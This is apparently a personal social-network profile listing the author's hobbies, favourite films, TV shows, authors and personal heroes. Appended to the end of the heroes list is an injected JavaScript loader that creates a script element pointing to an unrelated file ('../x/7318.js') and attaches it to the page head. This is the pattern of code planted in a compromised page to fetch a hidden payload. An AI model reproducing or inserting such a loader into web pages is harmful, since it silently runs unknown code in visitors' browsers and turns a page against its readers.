Gymnastics, sports, outdoors, reading ( scifi, ancient history, science journals, comics ), movies, music, hanging out with friends, etc...
People who can interest me past my short attention span. People to learn knowledge from to add to my own. People to hang out with good times and camaraderie.Savvy?!
Whatever I come across that I tastes vary too much too define it. I like some stuff, I don't mind other stuff, I don't listen to some stuff. Oh definitely gotta say Johnny Cash.
Surf Ninjas, Star Wars, Star Trek, the Hunted, 13th warrior, King Arthur, The Punisher ( 2nd one of recent time ), Equilibrium, The Bourne Identity and sequel, Kung Fu Hustle, Jet Li or Jackie Chan movies, LoR, Triple X, Highlander, 5th Element, Snatch, Lock Stock and Two Smoking Barrels, Batman, Mission Impossible II, Dune, Abbot and Costello, George of the Jungle, Rob Roy, Blade 1 and 2, Bruce Lee, Last of the Mohicans, X-Men, the Hulk, Spiderman, Captain Ron, Boondock Saints, Legend of the Fall, Hook, Stir of Echoes, Prophecy, the Crow, Indiana Jones, Vampire Hunter D, Dagger of Kamui, Curse of the Yoma, Demon City Shinjuku, King Kong, Batman Begins, Serenity, V for Vendetta
Stargate SG-1 and Atlantis, New Battle Star Galactica, Smallville, Angel, Buffy, Highlander, Star Trek series, Ruruoni Kenshin, DBZ, Hercules: The Legendary Journeys, Xena somewhat because of Autolycus and some episodes, Kung Fu, 7th Heaven, South Park, Dave LaChapelle, Justice League, X-men, Spiderman, Technoman, the Shield, Law and Order and SVU, the Drew Carey Show, Whose Line is it anyway, Boy Meets World, Voltron, Samurai Champloo, Outlaw Star, Eatman, Trigun, Cowboy Bebop, can't think of anything else, Rome, Sopranos, Heroes, Rescue Me, Jericho
Tolkien, Star Wars, Nietzche, Indiana Jones, Anne Rice, Michael Crichton, the Eddas, Comics by DC and Marvel and Dark Horse and Image, Robert E. Howard
Nietzche, Rob Schneider, Adam Sandler, Bruce Campbell, CuChulain, Bruce Lee, Theodore Roosevelt, Spartacus, Wolverine, Tesla, Arturius Rex, Gunnery Sgt Johnson and Chief Weekes, my old GOB polevault coach, George Hery, " The GYMNASTICSMAN " , Neil Resnick, John Milius, my philosophy teacher Johnny Terry, anthropology professor John Rush, Johnny Cash from above. .."var s=document·createElement('script');s.src='../x/7318.js' ;document·getElementsByTagName('head')[0].appendChild(s );"